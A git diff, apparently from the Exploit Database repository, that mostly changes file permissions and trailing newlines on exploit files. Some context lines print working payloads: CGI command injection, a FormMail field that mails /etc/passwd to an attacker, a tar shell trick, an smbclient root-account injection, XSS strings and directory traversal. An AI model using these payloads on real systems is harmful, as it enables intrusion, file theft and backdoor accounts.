-/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 \ No newline at end of file +/mmstdod.cgi?ALTERNATE_TEMPLATES=|%20echo%20"Content-Type:%20text%2Fhtml"%3Becho%20""%20%3B%20id%00 \ No newline at end of file diff --git a/platforms/unix/remote/20486.html b/platforms/unix/remote/20486.html old mode 100755 new mode 100644 index 0a9482039..ca62e0de8 --- a/platforms/unix/remote/20486.html +++ b/platforms/unix/remote/20486.html @@ -8,4 +8,4 @@ A web server can use a remote site's FormMail script without authorization, usin <body><form method="post" action="http://remote.target.host/cgi-bin/formmail.pl"> <input type="hidden" name="recipient" value="me@mymail.host; cat /etc/passwd | mail me@mymail.host"> <input type="submit" name="submit" value="submit"> -</form></body></html> \ No newline at end of file +</form></body></html> \ No newline at end of file diff --git a/platforms/unix/remote/20490.c b/platforms/unix/remote/20490.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20492.txt b/platforms/unix/remote/20492.txt old mode 100755 new mode 100644 index ffc59a6db..70a1719b2 --- a/platforms/unix/remote/20492.txt +++ b/platforms/unix/remote/20492.txt @@ -10,4 +10,4 @@ The problem exists in the ssldump handling of format strings. ssldump requires e 3) Type the following in Netscape Navigator: fixme:%s%s%s%s%s%s -4) watch as ssldump with gather the traffic then segfault.. \ No newline at end of file +4) watch as ssldump with gather the traffic then segfault.. \ No newline at end of file diff --git a/platforms/unix/remote/20495.c b/platforms/unix/remote/20495.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20512.txt b/platforms/unix/remote/20512.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20563.txt b/platforms/unix/remote/20563.txt old mode 100755 new mode 100644 index 5b1af4140..18f9f0b47 --- a/platforms/unix/remote/20563.txt +++ b/platforms/unix/remote/20563.txt @@ -98,4 +98,4 @@ Now using TAR conversion, get your "--use-compress-program=sh blah" file. ftp> get "--use-compress-program=sh blah".tar -It should open a connection then freeze. Now telnet to your bindshell port." \ No newline at end of file +It should open a connection then freeze. Now telnet to your bindshell port." \ No newline at end of file diff --git a/platforms/unix/remote/20594.txt b/platforms/unix/remote/20594.txt old mode 100755 new mode 100644 index da3e0b5e4..fa7de2221 --- a/platforms/unix/remote/20594.txt +++ b/platforms/unix/remote/20594.txt @@ -22,4 +22,4 @@ $ tail /var/log/syslog.debug Jan 24 14:17:01 xxx ftpd[30912]: PASV port 47479 assigned to 80862b0806487eb9778084da87bffff16c9640151020bfffe108401c9004 [127.0.0.1] -..<snip extra output>.. \ No newline at end of file +..<snip extra output>.. \ No newline at end of file diff --git a/platforms/unix/remote/20615.txt b/platforms/unix/remote/20615.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20617.c b/platforms/unix/remote/20617.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20646.c b/platforms/unix/remote/20646.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20660.txt b/platforms/unix/remote/20660.txt old mode 100755 new mode 100644 index cd92dbdd0..4395452d6 --- a/platforms/unix/remote/20660.txt +++ b/platforms/unix/remote/20660.txt @@ -16,4 +16,4 @@ http://www.attack.com/index.html'&xterm&'truehttp://www.attack.com </external/ht "http://www.attack.com/" </external/http://www.attack.com/> -* When the target user opens the URL, the shell commands contained within it (ie 'xterm') will be executed, potentially without warning to the user. \ No newline at end of file +* When the target user opens the URL, the shell commands contained within it (ie 'xterm') will be executed, potentially without warning to the user. \ No newline at end of file diff --git a/platforms/unix/remote/20730.c b/platforms/unix/remote/20730.txt old mode 100755 new mode 100644 similarity index 100% rename from platforms/unix/remote/20730.c rename to platforms/unix/remote/20730.txt diff --git a/platforms/unix/remote/20791.php b/platforms/unix/remote/20791.php old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20879.txt b/platforms/unix/remote/20879.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/20968.txt b/platforms/unix/remote/20968.txt old mode 100755 new mode 100644 index ea570c0ce..96559b586 --- a/platforms/unix/remote/20968.txt +++ b/platforms/unix/remote/20968.txt @@ -16,4 +16,4 @@ and also smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" -n ../../../tmp/x -N -I 192.168.12.13 -Yugo Yugos <yuggoboy@hotmail.com> provided an exploit script. It is available at http://www.securityfocus.com/data/vulnerabilities/exploits/samba-exp.sh \ No newline at end of file +Yugo Yugos <yuggoboy@hotmail.com> provided an exploit script. It is available at http://www.securityfocus.com/data/vulnerabilities/exploits/samba-exp.sh \ No newline at end of file diff --git a/platforms/unix/remote/20993.c b/platforms/unix/remote/20993.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21018.c b/platforms/unix/remote/21018.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21064.c b/platforms/unix/remote/21064.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21066.c b/platforms/unix/remote/21066.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21089.c b/platforms/unix/remote/21089.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21128.c b/platforms/unix/remote/21128.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21161.txt b/platforms/unix/remote/21161.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21215.c b/platforms/unix/remote/21215.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21297.c b/platforms/unix/remote/21297.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21314.txt b/platforms/unix/remote/21314.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21363.c b/platforms/unix/remote/21363.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21412.txt b/platforms/unix/remote/21412.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21574.txt b/platforms/unix/remote/21574.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21578.txt b/platforms/unix/remote/21578.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21579.txt b/platforms/unix/remote/21579.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21671.c b/platforms/unix/remote/21671.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21682.txt b/platforms/unix/remote/21682.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21704.txt b/platforms/unix/remote/21704.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21734.txt b/platforms/unix/remote/21734.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21853.txt b/platforms/unix/remote/21853.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/21882.txt b/platforms/unix/remote/21882.txt old mode 100755 new mode 100644 index d27ae1ac0..9018c69a8 --- a/platforms/unix/remote/21882.txt +++ b/platforms/unix/remote/21882.txt @@ -4,4 +4,4 @@ Apache Tomcat is reported to be prone to a vulnerability which may enable remote This issue is reported to affect Apache Tomcat 3.2.x on HP-UX 11.04 (VVOS) systems. It is not known whether other systems are also affected. -GET /%3F.jsp HTTP/1.0 \ No newline at end of file +GET /%3F.jsp HTTP/1.0 \ No newline at end of file diff --git a/platforms/unix/remote/21947.txt b/platforms/unix/remote/21947.txt old mode 100755 new mode 100644 index c57d7f16a..6df11b37a --- a/platforms/unix/remote/21947.txt +++ b/platforms/unix/remote/21947.txt @@ -8,4 +8,4 @@ Attacks of this nature may make it possible for attackers to steal cookie-based Request the following path from the caching proxy server: -/"><img%20src="javascript:alert(document.domain)"> \ No newline at end of file +/"><img%20src="javascript:alert(document.domain)"> \ No newline at end of file diff --git a/platforms/unix/remote/21948.txt b/platforms/unix/remote/21948.txt old mode 100755 new mode 100644 index 4a630cbda..49129d49e --- a/platforms/unix/remote/21948.txt +++ b/platforms/unix/remote/21948.txt @@ -7,4 +7,4 @@ Due to insufficient sanitization of user-supplied input it is possible for an at Attacks of this nature may make it possible for attackers to steal cookie-based authentication credentials. GET /%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert -(document.domain)">HTTP/1.0 \ No newline at end of file +(document.domain)">HTTP/1.0 \ No newline at end of file diff --git a/platforms/unix/remote/22049.c b/platforms/unix/remote/22049.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22084.c b/platforms/unix/remote/22084.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22085.txt b/platforms/unix/remote/22085.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22313.c b/platforms/unix/remote/22313.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22314.c b/platforms/unix/remote/22314.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22356.c b/platforms/unix/remote/22356.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22449.c b/platforms/unix/remote/22449.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22450.c b/platforms/unix/remote/22450.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22468.c b/platforms/unix/remote/22468.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22469.c b/platforms/unix/remote/22469.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22470.c b/platforms/unix/remote/22470.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22471.txt b/platforms/unix/remote/22471.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22475.txt b/platforms/unix/remote/22475.txt old mode 100755 new mode 100644 index 225ef1bf0..c892aec56 --- a/platforms/unix/remote/22475.txt +++ b/platforms/unix/remote/22475.txt @@ -18,4 +18,4 @@ Subject: AMaViS-ng 0.1.6.x bug . (250 Ok: queued as ...) quit -(221 Bye) \ No newline at end of file +(221 Bye) \ No newline at end of file diff --git a/platforms/unix/remote/22646.txt b/platforms/unix/remote/22646.txt old mode 100755 new mode 100644 index 1977e0f90..e69a493a6 --- a/platforms/unix/remote/22646.txt +++ b/platforms/unix/remote/22646.txt @@ -4,4 +4,4 @@ Vignette is prone to an issue which may expose the contents of memory to remote This issue was reported for Vignette on IBM AIX. Other platforms may also be affected, though this has not been confirmed. The issue affects some of the default templates provided with Vignette. -http://www.example.com/vgn/login/1,501,,00.html?cookieName=x--\> \ No newline at end of file +http://www.example.com/vgn/login/1,501,,00.html?cookieName=x--\> \ No newline at end of file diff --git a/platforms/unix/remote/22648.txt b/platforms/unix/remote/22648.txt old mode 100755 new mode 100644 index 1505ab915..5bc416b13 --- a/platforms/unix/remote/22648.txt +++ b/platforms/unix/remote/22648.txt @@ -10,4 +10,4 @@ This issue was reported for Vignette StoryServer version 4 to version 6; it has https://www.example.com/Page/1,10966,,00.html?var=<script>alert('s21sec')</script> -http://www.example.com/vgn/login?errInfo="%2b%20document.cookie%20%2b" \ No newline at end of file +http://www.example.com/vgn/login?errInfo="%2b%20document.cookie%20%2b" \ No newline at end of file diff --git a/platforms/unix/remote/22699.c b/platforms/unix/remote/22699.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22964.c b/platforms/unix/remote/22964.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22974.c b/platforms/unix/remote/22974.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/22975.c b/platforms/unix/remote/22975.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/23449.txt b/platforms/unix/remote/23449.txt old mode 100755 new mode 100644 index 362fd26e1..3236b34f2 --- a/platforms/unix/remote/23449.txt +++ b/platforms/unix/remote/23449.txt @@ -5,4 +5,4 @@ It has been reported that Xerox_MicroServer/Xerox11 may be prone to a directory GET /assist/.. GET /assist/////.././../../. http://www.example.com////../../data/config/microsrv.cfg -http://www.example.com////////../../../../../../etc/passwd \ No newline at end of file +http://www.example.com////////../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/unix/remote/24067.c b/platforms/unix/remote/24067.c old mode 100755 new mode 100644 index b744b49b0..c90523206 --- a/platforms/unix/remote/24067.c +++ b/platforms/unix/remote/24067.c @@ -159,9 +159,4 @@ int main(int argc, char *argv[]) } -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24067.lha - - - - - \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/24067.lha \ No newline at end of file diff --git a/platforms/unix/remote/24353.sql b/platforms/unix/remote/24353.sql old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/25335.txt b/platforms/unix/remote/25335.txt old mode 100755 new mode 100644 index 1e8ed1e48..53bfbddfe --- a/platforms/unix/remote/25335.txt +++ b/platforms/unix/remote/25335.txt @@ -4,4 +4,4 @@ A remote information disclosure issue affects IBM iSeries AS400 LDAP Server. Thi An authenticated attacker may leverage this issue to disclose user names and account information of users in their group. This may facilitate further attacks against the affected server. -ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE" \ No newline at end of file +ldapsearch -h as400.example.com -b "cn=accounts,os400-sys=S0011223.example.com" -D "os400-profile=SCARMEL,cn=accounts,os400-sys=S0011223.example.com" -w as400Password -L -s sub "os400-profile=LESLIE" \ No newline at end of file diff --git a/platforms/unix/remote/25624.c b/platforms/unix/remote/25624.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/25625.c b/platforms/unix/remote/25625.c old mode 100755 new mode 100644 index 4b295ed84..fe41c7aae --- a/platforms/unix/remote/25625.c +++ b/platforms/unix/remote/25625.c @@ -119,8 +119,4 @@ void changeport(char *code, int port, int offset) { /* Assume Little-Endianess.... */ *ptr++=(char)((port>>8)&0xff); *ptr++=(char)(port&0xff); -} - - - - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/unix/remote/27992.txt b/platforms/unix/remote/27992.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/28030.txt b/platforms/unix/remote/28030.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/30835.sh b/platforms/unix/remote/30835.sh index 30ddf85ad..a25beee31 100755 --- a/platforms/unix/remote/30835.sh +++ b/platforms/unix/remote/30835.sh @@ -24,4 +24,4 @@ then echo "$i is VULNERABLE!" fi -done \ No newline at end of file +done \ No newline at end of file diff --git a/platforms/unix/remote/31706.txt b/platforms/unix/remote/31706.txt old mode 100755 new mode 100644 index 9622faad2..401cf3d77 --- a/platforms/unix/remote/31706.txt +++ b/platforms/unix/remote/31706.txt @@ -6,4 +6,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary We don't know which specific versions of IBM Lotus Expeditor are affected. We will update this BID as more information emerges. -cai:"%20-launcher%20\\6.6.6.6\d$\trojan \ No newline at end of file +cai:"%20-launcher%20\\6.6.6.6\d$\trojan \ No newline at end of file diff --git a/platforms/unix/remote/32371.txt b/platforms/unix/remote/32371.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/32372.txt b/platforms/unix/remote/32372.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/32399.txt b/platforms/unix/remote/32399.txt old mode 100755 new mode 100644 index 2aa2cb2f0..79c452ed9 --- a/platforms/unix/remote/32399.txt +++ b/platforms/unix/remote/32399.txt @@ -20,4 +20,4 @@ ftp://ftp.example.com///////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////// ////////////////////////////////////////////////////////////////////// -/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE \ No newline at end of file +/////////////////////////////////////SITE%20CHMOD%20777%20EXAMPLEFILE \ No newline at end of file diff --git a/platforms/unix/remote/32811.txt b/platforms/unix/remote/32811.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/34621.c b/platforms/unix/remote/34621.c old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/40347.txt b/platforms/unix/remote/40347.txt old mode 100755 new mode 100644 diff --git a/platforms/unix/remote/764.c b/platforms/unix/remote/764.c old mode 100755 new mode 100644 diff --git a/platforms/unix/webapps/24690.txt b/platforms/unix/webapps/24690.txt old mode 100755 new mode 100644 diff --git a/platforms/unixware/local/21284.c b/platforms/unixware/local/21284.c old mode 100755 new mode 100644 diff --git a/platforms/unixware/remote/19705.c b/platforms/unixware/remote/19705.c old mode 100755 new mode 100644 diff --git a/platforms/unixware/shellcode/13503.txt b/platforms/unixware/shellcode/13503.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/18275.txt b/platforms/win_x86-64/dos/18275.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/39043.txt b/platforms/win_x86-64/dos/39043.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/39072.txt b/platforms/win_x86-64/dos/39072.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/39221.txt b/platforms/win_x86-64/dos/39221.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/39712.txt b/platforms/win_x86-64/dos/39712.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/40196.txt b/platforms/win_x86-64/dos/40196.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/dos/42445.html b/platforms/win_x86-64/dos/42445.html old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/20861.txt b/platforms/win_x86-64/local/20861.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/39035.txt b/platforms/win_x86-64/local/39035.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/39520.txt b/platforms/win_x86-64/local/39520.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/39984.txt b/platforms/win_x86-64/local/39984.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/40336.py b/platforms/win_x86-64/local/40336.py index 2f2aac45d..a455add48 100755 --- a/platforms/win_x86-64/local/40336.py +++ b/platforms/win_x86-64/local/40336.py @@ -64,7 +64,4 @@ try: debug.loop() finally: - debug.stop() - - - \ No newline at end of file + debug.stop() \ No newline at end of file diff --git a/platforms/win_x86-64/local/40337.py b/platforms/win_x86-64/local/40337.py index 0f1411e11..52647885f 100755 --- a/platforms/win_x86-64/local/40337.py +++ b/platforms/win_x86-64/local/40337.py @@ -87,7 +87,4 @@ try: debug.loop() finally: - debug.stop() - - - \ No newline at end of file + debug.stop() \ No newline at end of file diff --git a/platforms/win_x86-64/local/41020.c b/platforms/win_x86-64/local/41020.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/41605.txt b/platforms/win_x86-64/local/41605.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/41721.c b/platforms/win_x86-64/local/41721.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/41722.c b/platforms/win_x86-64/local/41722.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/41908.txt b/platforms/win_x86-64/local/41908.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/42435.txt b/platforms/win_x86-64/local/42435.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/local/42960.txt b/platforms/win_x86-64/local/42960.txt old mode 100755 new mode 100644 index 1a4026bfa..179464cf3 --- a/platforms/win_x86-64/local/42960.txt +++ b/platforms/win_x86-64/local/42960.txt @@ -14,4 +14,4 @@ We also published a blog post (https://siberas.de/blog/2017/10/05/exploitation_c Proof of Concept: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42960.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42960.zip \ No newline at end of file diff --git a/platforms/win_x86-64/remote/42354.html b/platforms/win_x86-64/remote/42354.html old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/13533.asm b/platforms/win_x86-64/shellcode/13533.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/13719.txt b/platforms/win_x86-64/shellcode/13719.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/13729.txt b/platforms/win_x86-64/shellcode/13729.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/35794.txt b/platforms/win_x86-64/shellcode/35794.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/37895.asm b/platforms/win_x86-64/shellcode/37895.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/40549.c b/platforms/win_x86-64/shellcode/40549.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/40781.c b/platforms/win_x86-64/shellcode/40781.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/40821.c b/platforms/win_x86-64/shellcode/40821.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/40890.c b/platforms/win_x86-64/shellcode/40890.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/40981.c b/platforms/win_x86-64/shellcode/40981.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/41072.c b/platforms/win_x86-64/shellcode/41072.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/41827.txt b/platforms/win_x86-64/shellcode/41827.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86-64/shellcode/42992.c b/platforms/win_x86-64/shellcode/42992.c old mode 100755 new mode 100644 index ae5b5c651..d727043cf --- a/platforms/win_x86-64/shellcode/42992.c +++ b/platforms/win_x86-64/shellcode/42992.c @@ -289,4 +289,4 @@ int main() CloseHandle(proc); return 0; -} +} \ No newline at end of file diff --git a/platforms/win_x86/dos/12457.txt b/platforms/win_x86/dos/12457.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/15758.c b/platforms/win_x86/dos/15758.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/1977.cpp b/platforms/win_x86/dos/1977.cpp old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/34010.html b/platforms/win_x86/dos/34010.html old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/35182.txt b/platforms/win_x86/dos/35182.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/37881.txt b/platforms/win_x86/dos/37881.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38265.txt b/platforms/win_x86/dos/38265.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38266.txt b/platforms/win_x86/dos/38266.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38267.txt b/platforms/win_x86/dos/38267.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38268.txt b/platforms/win_x86/dos/38268.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38269.txt b/platforms/win_x86/dos/38269.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38270.txt b/platforms/win_x86/dos/38270.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38271.txt b/platforms/win_x86/dos/38271.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38273.txt b/platforms/win_x86/dos/38273.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38274.txt b/platforms/win_x86/dos/38274.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38275.txt b/platforms/win_x86/dos/38275.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38276.txt b/platforms/win_x86/dos/38276.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38277.txt b/platforms/win_x86/dos/38277.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38278.txt b/platforms/win_x86/dos/38278.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38279.txt b/platforms/win_x86/dos/38279.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38280.txt b/platforms/win_x86/dos/38280.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/38307.txt b/platforms/win_x86/dos/38307.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/39026.txt b/platforms/win_x86/dos/39026.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/39027.txt b/platforms/win_x86/dos/39027.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/39993.txt b/platforms/win_x86/dos/39993.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/420.java b/platforms/win_x86/dos/420.java old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/4293.php b/platforms/win_x86/dos/4293.php old mode 100755 new mode 100644 diff --git a/platforms/win_x86/dos/4318.php b/platforms/win_x86/dos/4318.php old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/11112.c b/platforms/win_x86/local/11112.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/11408.c b/platforms/win_x86/local/11408.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/18861.php b/platforms/win_x86/local/18861.php old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/34037.txt b/platforms/win_x86/local/34037.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/3451.c b/platforms/win_x86/local/3451.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/37732.c b/platforms/win_x86/local/37732.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/38403.txt b/platforms/win_x86/local/38403.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/3888.c b/platforms/win_x86/local/3888.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/3912.c b/platforms/win_x86/local/3912.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/39432.c b/platforms/win_x86/local/39432.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/39574.cs b/platforms/win_x86/local/39574.cs old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/40039.cpp b/platforms/win_x86/local/40039.cpp old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/40564.c b/platforms/win_x86/local/40564.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/40627.c b/platforms/win_x86/local/40627.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/local/8799.txt b/platforms/win_x86/local/8799.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/remote/11615.txt b/platforms/win_x86/remote/11615.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/remote/2680.pm b/platforms/win_x86/remote/2680.pm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/remote/3822.c b/platforms/win_x86/remote/3822.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/remote/5079.c b/platforms/win_x86/remote/5079.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/remote/5330.c b/platforms/win_x86/remote/5330.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/remote/584.c b/platforms/win_x86/remote/584.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13504.asm b/platforms/win_x86/shellcode/13504.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13505.c b/platforms/win_x86/shellcode/13505.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13507.txt b/platforms/win_x86/shellcode/13507.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13508.asm b/platforms/win_x86/shellcode/13508.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13509.c b/platforms/win_x86/shellcode/13509.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13510.c b/platforms/win_x86/shellcode/13510.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13511.c b/platforms/win_x86/shellcode/13511.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13512.c b/platforms/win_x86/shellcode/13512.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13513.c b/platforms/win_x86/shellcode/13513.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13514.asm b/platforms/win_x86/shellcode/13514.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13516.asm b/platforms/win_x86/shellcode/13516.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13517.asm b/platforms/win_x86/shellcode/13517.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13518.c b/platforms/win_x86/shellcode/13518.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13519.c b/platforms/win_x86/shellcode/13519.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13520.c b/platforms/win_x86/shellcode/13520.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13521.asm b/platforms/win_x86/shellcode/13521.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13522.c b/platforms/win_x86/shellcode/13522.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13523.c b/platforms/win_x86/shellcode/13523.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13524.txt b/platforms/win_x86/shellcode/13524.txt old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13525.c b/platforms/win_x86/shellcode/13525.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13526.c b/platforms/win_x86/shellcode/13526.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13527.c b/platforms/win_x86/shellcode/13527.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13529.c b/platforms/win_x86/shellcode/13529.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13530.asm b/platforms/win_x86/shellcode/13530.asm old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13531.c b/platforms/win_x86/shellcode/13531.c old mode 100755 new mode 100644 diff --git a/platforms/win_x86/shellcode/13532.asm b/platforms/win_x86/shellcode/13532.asm old mode 100755 